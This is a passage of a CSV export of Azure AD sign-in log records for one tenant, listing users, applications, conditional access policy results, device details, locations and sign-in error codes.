'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 06:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",818ddda4-c0b9-4b32-b709-e117657e0b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 65001, 'additionalDetails': 'MFA requirement satisfied by claim in the token', 'failureReason': ""Application X doesn't have permission to access application Y or the permission has been revoked. Or The user or administrator has not consented to use the application with ID X. Send an interactive authorization request for this user and resource. Or The user or administrator has not consented to use the application with ID X. Send an authorization request to your tenant admin to act on behalf of the App : Y for Resource : Z.""}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,818ddda4-c0b9-4b32-b709-e117657e0b00,SigninLogs,Failed,50.6406517,5.572050095
+1757,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:04.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50058,None,The application tried to perform a silent sign in and the user could not be silently signed in. The application needs to start an interactive flow giving users an option to sign in. Contact app owner.,0,f4868e75-f881-47b6-b080-3adf2ba03e49,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 06:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",6ab139a2-776a-491f-a231-a5750b620d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50058, 'additionalDetails': 'MFA requirement satisfied by claim in the token', 'failureReason': 'The application tried to perform a silent sign in and the user could not be silently signed in. The application needs to start an interactive flow giving users an option to sign in. Contact app owner.'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,6ab139a2-776a-491f-a231-a5750b620d00,SigninLogs,Failed,50.6406517,5.572050095
+1758,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:17.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:19,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",6629fc52-8b3a-48ea-9d2f-4baf4b7a4c00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6629fc52-8b3a-48ea-9d2f-4baf4b7a4c00,SigninLogs,Sucess,32.32146072,34.85319901
+1759,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:07.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,53f72143-fe72-461a-ba2b-f502f6fbf9f8,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",2b6dd05c-6ab3-47f4-b023-40d0cfbf0a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2b6dd05c-6ab3-47f4-b023-40d0cfbf0a00,SigninLogs,Sucess,36.6404686,-78.26995087
+1760,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:09.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:19,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",94481b56-6f72-4a0d-b77c-172126153400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,94481b56-6f72-4a0d-b77c-172126153400,SigninLogs,Sucess,32.32146072,34.85319901
+1761,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:12.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b0d193c-aa8f-46c9-83e7-a8c5daf2946f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",cfab9824-c87d-41e8-8623-1f6d3c690b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cfab9824-c87d-41e8-8623-1f6d3c690b00,SigninLogs,Sucess,36.6404686,-78.26995087
+1762,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:12.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b0d193c-aa8f-46c9-83e7-a8c5daf2946f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 06:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",cfab9824-c87d-41e8-8623-1f6d3c690b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cfab9824-c87d-41e8-8623-1f6d3c690b00,SigninLogs,Sucess,36.6404686,-78.26995087
+1763,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:31.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfb594d3-442a-4170-8076-554477d0fa4c,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 06:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",11779f6a-e330-484b-9e89-76d9a6cc0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,11779f6a-e330-484b-9e89-76d9a6cc0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1764,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:06.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4a965e4a-b329-44c4-b6ae-0bbaec400d7d,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 